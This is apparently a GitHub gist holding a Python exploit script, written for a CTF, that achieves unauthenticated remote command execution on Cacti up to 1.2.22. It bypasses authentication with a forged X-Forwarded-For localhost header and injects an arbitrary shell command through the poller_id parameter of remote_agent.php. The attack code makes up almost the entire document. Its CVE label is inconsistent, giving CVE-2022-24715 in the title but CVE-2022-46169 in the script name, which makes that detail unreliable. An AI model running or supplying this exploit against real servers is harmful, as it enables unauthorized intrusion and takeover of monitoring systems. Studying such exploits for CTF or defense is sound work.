Skip to content

Instantly share code, notes, and snippets.

@bryanmcnulty
Created August 28, 2023 02:57
Show Gist options
  • Save bryanmcnulty/df8ee3e77bc87c8b31a244e8cbc688cd to your computer and use it in GitHub Desktop.
Save bryanmcnulty/df8ee3e77bc87c8b31a244e8cbc688cd to your computer and use it in GitHub Desktop.
CVE-2022-24715 :: Unauthenticated command injection on Cacti <= 1.2.22
#!/usr/bin/env python3
'''
* Written for a CTF :)
* ---
* Author: Bryan McNulty
* Contact: bryanmcnulty@protonmail.com
* Blog: https://bryanmcnulty.github.io
* GitHub: https://github.com/bryanmcnulty
* LinkedIn: https://www.linkedin.com/in/bryanmcnulty
* ---
*
* Dependencies:
* - argparse
* - requests
*
* Unauthenticated command injection on Cacti <= 1.2.22 :: CVE-2022-24715
'''
import requests
import argparse
def main():
parser = argparse.ArgumentParser(prog='CVE-2022-46169.py', description='Unauthenticated RCE on Cacti <= 1.2.22')
parser.add_argument('target', help='Target URL')
parser.add_argument('-c', '--command', required=True, help='Command to run on target')
group = parser.add_argument_group('Tuning')
group.add_argument('-i', '--host-ids', metavar='MAX', type=int, default=100, help='Maximum number of host IDs to test')
group.add_argument('-l', '--local-data-ids', metavar='MAX', type=int, default=50, help='Number of local data IDs to test')
args = parser.parse_args()
if args.target.startswith('http://') or args.target.startswith('https://'):
target = args.target.rstrip('/')
else:
target = 'http://'+args.target.rstrip('/')
for host_id in range(args.host_ids):
params = {
'action': 'polldata',
'host_id': host_id,
'poller_id': '; ' + args.command,
'local_data_ids[]': list(range(args.local_data_ids))
}
try:
response = requests.get(target + '/remote_agent.php', params=params, headers={'X-Forwarded-For': '127.0.0.1'})
if 'proc' in response.text:
print('Success!')
break
except requests.exceptions.InvalidURL:
print('Invalid target URL')
exit(1)
if __name__ == '__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment